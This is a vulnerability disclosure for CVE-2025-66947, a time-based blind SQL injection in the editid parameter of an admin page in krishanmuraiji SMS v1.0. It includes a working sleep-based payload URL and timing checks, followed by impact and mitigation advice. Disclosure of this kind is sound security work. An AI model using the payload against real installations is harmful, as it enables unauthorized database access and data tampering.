# CVE-2025-66947 

### Time Based Blind SQL Injection in krishanmuraiji SMS v1.0

<img src="https://i.imgur.com/dBaSKWF.gif" height="20" width="100%">

> ⏱️ Visual comparison: normal response vs ~6s delayed response

## 🔍 Summary
> **TL;DR:** A GET parameter in an admin module allows time-based SQL injection via response delays.

A **𝗧𝗶𝗺𝗲 𝗯𝗮𝘀𝗲𝗱 𝗯𝗹𝗶𝗻𝗱 𝗦𝗤𝗟 𝗶𝗻𝗷𝗲𝗰𝘁𝗶𝗼𝗻 𝘃𝘂𝗹𝗻𝗲𝗿𝗮𝗯𝗶𝗹𝗶𝘁𝘆** exists in krishanmuraiji SMS v1.0 due to improper validation of a GET parameter in an administrative module.

---

## 🎯 Affected Component
- **File:** `/studentms/admin/edit-class-detail.php`
- **Parameter:** `editid` (GET)
- **Issue:** Unsanitized input directly used in SQL query


## 🧪 Proof of Concept (PoC)

### Step 1 — Normal Request

`/studentms/admin/edit-class-detail.php?editid=12 `


### Step 2 — Inject Time-Based Payload

`/studentms/admin/edit-class-detail.php?editid=12*if(now()=sysdate(),sleep(6),0)`


### Expected Result
- Server response delayed by **~6 seconds**
- No visible error message
- Delay confirms SQL injection

## ⏱️ Timing Verification

| Payload | Delay |
|-------|-------|
| `sleep(3)` | ~3s |
| `sleep(6)` | ~6s |
| `sleep(15)` | ~15s |

Consistent delay = **SQL Injection Confirmed**


## 📌 Where This Pattern Appears
This vulnerability pattern commonly appears in:
- PHP CRUD applications
- Student / Library / Inventory systems
- Admin panels trusting numeric GET parameters
- Applications with disabled SQL errors


## 🛡️ Impact
- Database information disclosure
- Unauthorized data modification
- Privilege escalation
- Backend database compromise

## 🧠 Why This Matters
Even when authentication is required and errors are hidden,  
Time based SQL injection remains exploitable and dangerous.


**Severity:** High


## 🔧 Mitigation
- Use prepared statements
- Validate numeric parameters
- Avoid SQL query concatenation
- Apply least-privilege database access


## 🆔 CVE

CVE-2025-66947


## 👤 Discoverer

[`Ranjan Kumar`](https://kabir-sand.vercel.app)
---

## ⚠️ Disclaimer
This PoC is provided for **educational and defensive purposes only**.

> CVE-2025-66947, SQL Injection, Time-Based Blind SQL Injection, PHP, Admin Panel
